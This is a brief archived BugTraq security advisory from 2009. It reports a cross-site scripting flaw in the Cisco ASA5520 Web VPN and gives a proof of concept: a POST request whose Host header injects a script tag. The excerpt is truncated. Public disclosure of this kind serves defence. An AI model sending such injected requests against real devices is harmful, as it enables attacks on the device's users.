BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Cisco ASA5520 Web VPN Host Header XSS Mar 31 2009 10:17AM
Bugs NotHugs (bugsnothugs gmail com)
- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbi...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus